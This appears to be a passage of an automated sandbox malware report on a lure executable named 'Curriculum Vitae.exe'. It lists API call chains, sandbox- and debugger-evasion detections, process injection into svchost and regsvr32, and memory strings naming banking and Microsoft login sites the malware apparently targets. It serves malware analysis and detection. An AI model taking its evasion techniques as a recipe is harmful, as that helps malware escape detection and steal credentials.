            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_02939A79 pushad ; ret 6_2_02939A7C
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0293BDD6 push ebp; retf 6_2_0293BDE1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_048BC4B4 push esi; retf 6_2_048BC4B5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_048B47C1 push FFFFFFCFh; iretd 6_2_048B4816
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_048B50E3 push esi; retf 6_2_048B50E5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_048BF216 push edx; iretd 6_2_048BF224
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D4F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00D4F98E
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DC1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00DC1C41
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98832
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeAPI/Special instruction interceptor: Address: 3BB3204
            Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\regsvr32.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EBF3 rdtsc 2_2_0041EBF3
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeAPI coverage: 4.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2828Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2828Thread sleep time: -62000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D9DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00D9DBBE
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D6C2A2 FindFirstFileExW,0_2_00D6C2A2
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA68EE FindFirstFileW,FindClose,0_2_00DA68EE
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DA698F
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D9D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D9D076
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D9D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D9D3A9
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DA9642
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DA979D
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DA9B2B
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DA5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00DA5C97
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0293C270 FindFirstFileW,FindNextFileW,FindClose,6_2_0293C270
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D342DE
            Source: f18641C2.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: f18641C2.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20A
            Source: f18641C2.6.drBinary or memory string: discord.comVMware20,11696428655f
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n PasswordVMware20,11696428655x
            Source: f18641C2.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l.comVMware20,11696428655h
            Source: f18641C2.6.drBinary or memory string: global block list test formVMware20,11696428655
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageVMware20,11696428655
            Source: f18641C2.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: blocklistVMware20,11696428655
            Source: f18641C2.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: f18641C2.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: f18641C2.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428
            Source: f18641C2.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: f18641C2.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: f18641C2.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: f18641C2.6.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: f18641C2.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,116S
            Source: f18641C2.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: regsvr32.exe, 00000006.00000002.3269626827.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, OAIexgManRWDie.exe, 00000007.00000002.3270213156.000000000101F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: f18641C2.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: f18641C2.6.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: f18641C2.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: f18641C2.6.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: f18641C2.6.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: f18641C2.6.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: f18641C2.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: f18641C2.6.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: f18641C2.6.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,1
            Source: f18641C2.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: f18641C2.6.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: f18641C2.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: f18641C2.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: f18641C2.6.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: regsvr32.exe, 00000006.00000002.3273025695.0000000007FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ist test formVMware20,11696428655
            Source: f18641C2.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: firefox.exe, 00000008.00000002.2962113298.0000021E7F07C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@@
            Source: f18641C2.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EBF3 rdtsc 2_2_0041EBF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004171C3 LdrLoadDll,2_2_004171C3
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00DAEAA2 BlockInput,0_2_00DAEAA2
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D62622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D62622
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D342DE
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_00D54CE8 mov eax, dword ptr fs:[00000030h]0_2_00D54CE8
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_03BB34D0 mov eax, dword ptr fs:[00000030h]0_2_03BB34D0
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_03BB3470 mov eax, dword ptr fs:[00000030h]0_2_03BB3470
            Source: C:\Users\user\Desktop\Curriculum Vitae.exeCode function: 0_2_03BB1E70 mov eax, dword ptr fs:[00000030h]0_2_03BB1E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
